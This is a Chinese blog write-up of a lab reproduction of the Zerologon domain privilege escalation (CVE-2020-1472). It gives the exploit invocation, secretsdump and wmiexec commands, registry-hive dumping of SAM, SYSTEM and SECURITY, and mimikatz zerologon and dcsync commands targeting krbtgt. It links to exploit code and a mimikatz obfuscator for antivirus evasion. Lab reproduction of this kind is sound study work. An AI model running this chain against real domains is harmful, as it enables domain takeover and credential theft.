CVE-2020-1472(域内提权)漏洞复现

  1. 环境搭建
  2. 漏洞复现
  3. Poc/Exp
  4. 漏洞原理
  5. Mimikatz

2020年9月16日 星期二 阴

深夜难眠,回想起今天waf上一大堆误报和寥寥无几的告警,甲方爸爸提供的两荤一素已经换成了白粥榨菜,农夫已经换成了怡宝,猪肉换成了榨菜,或许我们是时长一个月实习生的身份,已经彻底暴露了,明天不知道是不是只能吃开水泡面了。唉,明天又要穿上白衬衫,继续假装自己是5年工作经验的安全专家,今晚终于认清现实,活捉红队0day依然是我们遥不可及的梦。

生而为人,谁都是第一次。

环境搭建

简单的域环境搭建

发现环境还有,稍微改了一下:

  • Domain:hacke
  • Windows server 2012(DC) 192.168.43.100
  • Windows server 2008 192.168.43.101
  • Windows7 192.168.43.102
  • Kali(攻击机器) 192.168.43.105

漏洞复现

利用过程:将域控密码设置为空->读取hash->读取sam文件hash(ntds.dit)->恢复域控密码

要安装impacket:

1
2
3
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
python3 setup.py install

下载我们的poc(下文有下载连接)
执行命令:

1
python3 cve-2020-1472-exploit.py {computer name} {ip}

执行成功之后,密码就会修改为空(修改的是域控的机器密码,不是域控的密码),接下来用impacket中的/impacket/examples/secretsdump.py来读取域控中的hash

当我们获取了hash之后(这里应该是域管的),我们可以读取域控制器中sam文件的hash,用来获取之前机器的原始密码(读取SAM和SYSTEM文件中的NTLM-HASH)

通过wmiexec执行命令:

1
ython3 wmiexec.py -hashes xxxxxx hacke/Administrator@192.168.43.100

然后将三个文件搞下来:

1
2
3
4
5
6
7
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive

get sam.hive
get system.hive
get security.hive

读取sam里面的hash:

1
python3 secretsdump.py -sam sam.hive -security security.hive -system system.hive  LOCAL


居然吧我之前修改过的历史密码也读取出来了,也不知道为啥 ==

最后,利用脚本传入hash,恢复之前的密码

再来检查密码是否正确(之前修改后密码为空)

Poc/Exp

https://github.com/dirkjanm/CVE-2020-1472
https://github.com/SecureAuthCorp/impacket
https://github.com/risksense/zerologon

漏洞原理

Netlogon 特权提升漏洞(CVE-2020-1472)原理分析与验证

看不懂,那咋办啊~

Mimikatz


上午看见发布了部分代码,下午就更新了,不给过mimikatz太敏感,后续还得想想免杀叭

更新一下部分Mimikatz命令

1
2
3
4
5
6
7
8
9
10
11
12
13
mimikatz zerologon域:hacke.testlab

lsadump::dcsync /domain:HACKE.testlab /dc:dc.hacke.testlab /user:krbtgt /authuser:dc$ /authdomain:HACKE /authpassword:"" /authntlm #空密码尝试

privilge::debug #权限提升

lsadump::zerologon /target:dc.hacke.testlab /account:dc$ #这个是poc

lsadump::zerologon /target:dc.hacke.testlab /account:dc$ /exploit #这个是exp

lsadump::dcsync /domain:HACKE.LOCAL /dc:dc.hacke.testlab /user:krbtgt /authuser:dc$ /authdomain:HACKE /authpassword:"" /authntlm #再次空密码尝试

lsadump::postzerologon /target:192.168.43.100 /account:dc$ #恢复密码

https://github.com/gentilkiwi/mimikatz
https://github.com/DimopoulosElias/SimpleMimikatzObfuscator


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 sher10cksec@foxmail.com

文章标题:CVE-2020-1472(域内提权)漏洞复现

本文作者:sher10ck

发布时间:2020-09-16, 16:41:58

最后更新:2020-09-18, 00:49:43

原始链接:http://sherlocz.github.io/2020/09/16/CVE-2020-1472/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录